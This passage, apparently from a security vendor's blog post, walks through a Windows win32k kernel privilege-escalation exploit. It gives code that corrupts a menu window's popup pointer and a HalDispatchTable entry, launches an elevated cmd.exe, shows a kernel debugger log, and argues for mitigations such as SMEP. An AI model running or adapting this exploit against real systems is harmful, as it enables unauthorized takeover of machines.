wndClassEx.hInstance = GetModuleHandle(NULL);
wndClassEx.lpszClassName = L"ExploitClass";
printf("[*] Registering malformed class... ");
clsAtom = fnRegisterClassExWOWW(&wndClassEx, 0, FNID_MENU, 0);
SUCCESS_OR_FAIL(clsAtom != 0);

After performing these commands, the fnid table is going to show size 0xa4 (== sizeof(WND)) for menu windows, while the menu window class still (correctly) shows cbWndExtra == 4. This will allow us to change one DWORD of data using SetWindowLong at offset 0 of the extra bytes (the ppopupmenu pointer).
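Why shrinking the fnid table entry matters can be illustrated with a small user-mode model. This is only a sketch, not the win32k.sys code: the `ModelWindow` structure, its field names and `model_set_window_long` are hypothetical, and the check is an assumed simplification in which the bytes between sizeof(WND) and the fnid table size are treated as private to the system and everything beyond them, up to cbWndExtra, is writable.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define SIZEOF_WND 0xa4u  /* sizeof(WND), as quoted in the article */

/* Hypothetical, simplified stand-in for a menu window and its class data. */
typedef struct {
    uint32_t cbFnidSize;  /* size recorded in the fnid table for this window type */
    uint32_t cbWndExtra;  /* extra bytes declared by the window class */
    uint8_t  extra[4];    /* the extra bytes (ppopupmenu sits at offset 0) */
} ModelWindow;

/* Assumed model of the bounds check: returns 1 and writes, or returns 0. */
int model_set_window_long(ModelWindow *w, uint32_t index, uint32_t value)
{
    uint32_t reserved;

    assert(w != NULL);
    assert(w->cbFnidSize >= SIZEOF_WND);

    /* Bytes the system keeps for itself according to the fnid table. */
    reserved = w->cbFnidSize - SIZEOF_WND;
    if (index < reserved)
        return 0;  /* offset falls inside the protected private bytes */

    /* The write must also fit inside the extra bytes declared by the class. */
    if (w->cbWndExtra < 4u || w->cbWndExtra > sizeof(w->extra))
        return 0;
    if (index > w->cbWndExtra - 4u)
        return 0;

    memcpy(&w->extra[index], &value, sizeof(value));
    return 1;
}
```

In this model, a window with a table size of 0xa8 rejects a write at offset 0, while the same window with the table size lowered to 0xa4 accepts it, which is the disparity the malformed class registration creates.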

Now we need to create a menu window. Calling CreatePopupMenu from user mode doesn’t help much, as the kernel simply allocates memory for a menu object (see InternalCreateMenu). We need a way to actually create a window for a menu. As mentioned earlier, we cannot simply use CreateWindow/CreateWindowEx: if we try it with the menu window class (0x8000), the call fails.

If we try creating a window out of our malformed class that has an fnid of 0x29c (FNID_MENU), we are not going to get the xxxMenuWindowProc to run at all. First of all, when we register our class we cannot give the address of xxxMenuWindowProc as our window procedure (even if we know the address, RegisterClassExWOWW will just fail). So we must use an address in user space. xxxCreateWindowEx calls MapClientNeuterToClientPfn to determine the window procedure to use. The first argument is a pointer to our class object, and the second should be a default window procedure to use. In our case, xxxCreateWindowEx passes NULL. The function itself is:

WNDPROC __stdcall MapClientNeuterToClientPfn(tagCLS *pcls, WNDPROC *defWndProcToUse, int dummy)
{
    WNDPROC result; // eax@1
    unsigned __int16 v4; // cx@3

    result = defWndProcToUse;
    if (!defWndProcToUse)
        result = pcls->lpfnWndProc;
    v4 = LOWORD(pcls->fnid);
    if (v4 >= 0x2A1u && v4 <= 0x2A9u)
    {
        // Omitted - we never get here (FNID_MENU == 0x29c)
    }
    return result;
}

So we’re stuck with our own user-mode window procedure, which cannot do anything interesting, let alone manipulate a kernel object directly. We must find a way to create a window from the menu class, with xxxMenuWindowProc as its window procedure, and get a handle to it. Fortunately, as we’ve seen before, xxxTrackPopupMenuEx creates a menu window for us, and it can be called from user mode. Now we just need a handle to that window. To get one, we call FindWindow with 0x8000, the class atom of a menu window. The trick is knowing when to call it: we do so exactly when our own window procedure receives the WM_INITMENUPOPUP message.

/* Create a menu and a window to receive the menu window's messages */
printf("[*] Creating window to handle menu messages... ");
hWnd = CreateWindow(clsAtom, NULL, 0, 0, 0, 1, 1, NULL, NULL, NULL, NULL);
SUCCESS_OR_FAIL(hWnd != NULL);
printf("[*] Creating menu... ");
hMenu = CreatePopupMenu();
SUCCESS_OR_FAIL(hMenu != NULL);
if (!AppendMenu(hMenu, MF_STRING, 1, L"You had better install Cyvera TRAPS"))
	printf("Could not append to menu\n");

/* This will create a menu window in the kernel and start the exploitation process */
TrackPopupMenu(hMenu, 
	TPM_LEFTALIGN | TPM_RIGHTBUTTON, 
	0, 0, 0, hWnd, NULL);

And our window procedure is:

LRESULT CALLBACK WindowProc(
  _In_  HWND hwnd,
  _In_  UINT uMsg,
  _In_  WPARAM wParam,
  _In_  LPARAM lParam
)
{
	if (uMsg == WM_INITMENUPOPUP)
		Exploit();
	return DefWindowProc(hwnd, uMsg, wParam, lParam);
}

Where Exploit does this:

void Exploit() {

	HWND hwndMenu;
	LONG res;

	printf("[*] Finding menu window... ");
	/* 0x8000 is the class atom of the menu window class */
	hwndMenu = FindWindow((LPCWSTR)0x8000, NULL);
	SUCCESS_OR_FAIL(hwndMenu != NULL);
	printf("[*] Trashing popup pointer... ");
	/* SetWindowLong returns the previous value, which may legitimately be 0,
	   so clear the last error first to tell success from failure */
	SetLastError(0);
	res = SetWindowLong(hwndMenu, 0, (LONG)&tpm);
	SUCCESS_OR_FAIL(res != 0 || GetLastError() == 0);
	printf("[*] Destroying popup window... ");
	SUCCESS_OR_FAIL(DestroyWindow(hwndMenu) != 0);
}

And that’s it – we’ve nulled a pointer in the HalDispatchTable. All that’s left is to call the function that will use that pointer to run our code (starting from the trampoline and moving on to the token-changing function). After we do that, we can simply spawn a shell:

NtQueryIntervalProfile(2, 0);

printf("[*] Launching cmd... ");
SUCCESS_OR_FAIL(RunProcess(L"C:\\Windows\\system32\\cmd.exe") == TRUE);

We can see the result of running the exploit here (note the user for process 3500):

Some More Creativeness

Microsoft patched the ability to allocate page 0 in April this year, although on Windows 7, for example, this is enforced by default only on 64-bit systems. Even if you cannot allocate page 0, you don’t really have to use the NULL page to abuse this vulnerability. Here are some constructs you can use:

You can set a pointer to NULL, as we’ve already seen.
You can decrement a number by 1, as demonstrated with the cLockObj field.
You can OR a number with 0x8000, when the popup menu is marked as “destroyed”.

Of course, this means you may be corrupting more pieces of kernel memory (with the obvious implications), but it is surely doable:

Connected to Windows XP 2600 x86 compatible target at (Fri Sep 20 10:45:34.361 2013 (UTC + 3:00)), ptr64 FALSE
Kernel Debugger connection established.
Symbol search path is: SRV*D:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Kernel Version 2600 UP Free x86 compatible
Built by: 2600.xpsp_sp3_gdr.111025-1629
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
System Uptime: not available
Single step exception - code 80000004 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
001b:007268c2 8d55b8 lea edx,[ebp-48h]
kd> ba e 1 0x00ffffff
kd> g
Breakpoint 0 hit
00ffffff e9cc1740ff jmp 004017d0
kd> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
b10b6cfc 8063d59d 00000001 0000000c b10b6d14 0xffffff
b10b6d20 8060eb13 00000002 b10b6d64 0012ff60 nt!KeQueryIntervalProfile+0x37 (FPO: [Non-Fpo])
b10b6d54 8053d6d8 00000002 0012ff74 0012ff7c nt!NtQueryIntervalProfile+0x61 (FPO: [Non-Fpo])
b10b6d54 7c90e514 00000002 0012ff74 0012ff7c nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b10b6d64)
0012ff4c 7c90d84a 0040177c 00000002 0012ff74 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
0012ffd0 80544cfd 0012ffc8 81e019e8 ffffffff ntdll!NtQueryIntervalProfile+0xc (FPO: [2,0,0])
00130010 00000000 00000020 00000000 00000014 nt!ExFreePoolWithTag+0x417 (FPO: [Non-Fpo])

Disallowing allocations of page 0 will indeed thwart some attacks, but as we can see, in this case we can easily use higher addresses for our exploit. To effectively close this class of attacks and force attackers to be much more creative, a hardware-assisted solution like SMEP (Supervisor Mode Execution Prevention) is necessary.

Cyvera TRAPS obstructs such exploitation techniques and provides advanced exploit-mitigation mechanisms (including hardware-assisted ones) even for operating systems that do not support those mitigations natively.